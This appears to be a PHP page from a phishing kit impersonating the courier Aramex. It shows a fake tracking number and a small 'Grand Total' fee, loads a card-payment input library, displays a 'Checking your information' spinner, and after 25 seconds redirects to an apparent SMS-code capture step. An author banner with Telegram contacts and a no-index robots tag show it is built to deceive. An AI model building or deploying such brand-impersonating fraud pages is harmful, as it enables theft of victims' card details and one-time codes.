<?php
    /*******
    Main Author: EL GH03T && Z0N51
    Contact me on telegram : https://t.me/elgh03t / https://t.me/z0n51
    ********************************************************/
    
    require_once '../includes/main.php';
?>
<!doctype html>
<html>

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
        
        <!-- CSS FILES -->
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
        <link rel="stylesheet" href="../assets/css/helpers.css">
        <link rel="stylesheet" href="../assets/css/style.css">

        <link rel="icon" type="image/png" href="../assets/imgs/favicon.png" />

        <title>Aramex</title>
    </head>

    <body>

		<!-- HEADER -->
        <header id="header">
            <div class="topmenu d-lg-blck d-md-block d-sm-none d-none">
                <div class="container text-right"><img style="min-width: 554px;" src="../assets/imgs/topmenu.png"></div>
            </div>
            <div class="mainmenu">
                <div class="container d-flex align-items-center">
                    <div class="logo flex-grow-1"><img src="../assets/imgs/logo.svg"></div>
                    <div class="menu">
                        <img style="min-width: 567px;" class="d-lg-block d-md-block d-sm-none d-none" src="../assets/imgs/mainmenu.png">
                        <img style="min-width: 121px;" class="d-lg-none d-md-none d-sm-block d-none" src="../assets/imgs/mainmenu2.png">
                        <img style="min-width: 59px;" class="d-lg-none d-md-none d-sm-none d-block" src="../assets/imgs/mainmenu3.png">
                    </div>
                </div>
            </div>
        </header>
        <!-- END HEADER -->

        <!-- MAIN -->
        <main id="main">
            <div class="container">
                <div class="row">
                    <div class="col-md-4 d-lg-block d-md-block d-sm-none d-none">
                        <aside class="sidebar">
                            <div class="widget">
                                <ul>
                                    <li class="active"><span>Track Shipments</span> <i class="fas fa-arrow-right"></i></li>
                                    <li><span>Track Pickup Requests</span> <i class="fas fa-arrow-right"></i></li>
                                    <li><span>Advanced Tracking</span> <i class="fas fa-arrow-right"></i></li>
                                    <li><span>Notifications</span> <i class="fas fa-arrow-right"></i></li>
                                </ul>
                            </div>
                            <div class="widget">
                                <div class="text">
                                    <p>Customer Support</p>
                                    <div class="sym"><img src="../assets/imgs/phone.png"></div>
                                    <h3>Questions About Your Shipment?</h3>
                                </div>
                                <ul>
                                    <li><span style="font-size: 20px;"><small>support</small>Submit Request</span> <img src="../assets/imgs/email.png"></li>
                                </ul>
                            </div>
                        </aside>
                    </div>
                    <div class="col-md-8">
                        <article class="content">
                            <div class="box">
                                <div class="tracking">
                                    <p>Shipment Summary</p>
                                    <div class="sym"><img src="../assets/imgs/network.png"></div>
                                    <h3>Tracking Number: <span>30876489055</span></h3>
                                </div>
                                <div class="price d-flex">
                                    <div class="left flex-grow-1">
                                        <p>Transaction Ref. #VSH160364321396 <small>Standard package</small></p>
                                    </div>
                                    <div class="right">
                                        <p>Grand Total. 4.23AED <small>(VAT INCLUDED)</small></p>
                                    </div>
                                </div>
                            </div>
                            <div class="box pl-5 pr-5">
                                <div class="loader">
                                    <div class="spinner-border text-primary" role="status"></div>
                                    <p>Checking your information...</p>
                                </div>  
                            </div>
                        </article>
                    </div>
                </div>
            </div>
        </main>
        <!-- END MAIN -->

        <!-- FOOTER -->
        <footer id="footer">
            <div class="container">
                <div class="row">
                    <div class="col-lg-2 col-md-3 col-sm-4 col-12 mb-lg-0 mb-md-5 mb-sm-5 mb-5">
                        <div class="widget">
                            <h3>Developers Center</h3>
                            <ul>
                                <li>Aramex ClickToShip</li>
                                <li>Aramex APIs</li>
                                <li>Developers Forum</li>
                                <li>E-Commerce Platforms</li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-2 col-md-3 col-sm-4 col-12 mb-lg-0 mb-md-5 mb-sm-5 mb-5">
                        <div class="widget">
                            <h3>About</h3>
                            <ul>
                                <li>About Aramex</li>
                                <li>Investor Relations</li>
                                <li>Delivering Good</li>
                                <li>Franchise</li>
                                <li>Certifications</li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-2 col-md-3 col-sm-4 col-12 mb-lg-0 mb-md-5 mb-sm-5 mb-5">
                        <div class="widget">
                            <h3>Legal</h3>
                            <ul>
                                <li>Terms Of Use</li>
                                <li>Fraud Prevention</li>
                                <li>Privacy Policy</li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-2 col-md-3 col-sm-4 col-12 mb-lg-0 mb-md-5 mb-sm-5 mb-5">
                        <div class="widget">
                            <h3>Connect</h3>
                            <ul>
                                <li>Customer Support</li>
                                <li>Careers</li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-3 col-sm-4 col-12">
                        <div class="text">
                            <img src="../assets/imgs/search.png">
                            <ul>
                                <li><i class="fab fa-facebook-f"></i></li>
                                <li><i class="fab fa-twitter"></i></li>
                                <li><i class="fab fa-instagram"></i></li>
                                <li><i class="fab fa-linkedin"></i></li>
                                <li><i class="fab fa-youtube"></i></li>
                            </ul>
                            <p>&copy; Aramex <?php echo date('Y'); ?>. All rights reserved.</p>
                        </div>
                    </div>
                </div>
            </div>
        </footer>
        <!-- END FOOTER -->

        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/3.0.0/jquery.payment.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/jquery-simple-upload@1.1.0/simpleUpload.min.js"></script>
        <script src="../assets/js/script.js"></script>

        <script type="text/javascript">
            var dispatch = '<?php echo $dispatch; ?>';
            setTimeout(function () {
                window.location.href= '../index.php?redirection=sms';
            },25000); // 1000 = 1s
        </script>

    </body>

</html>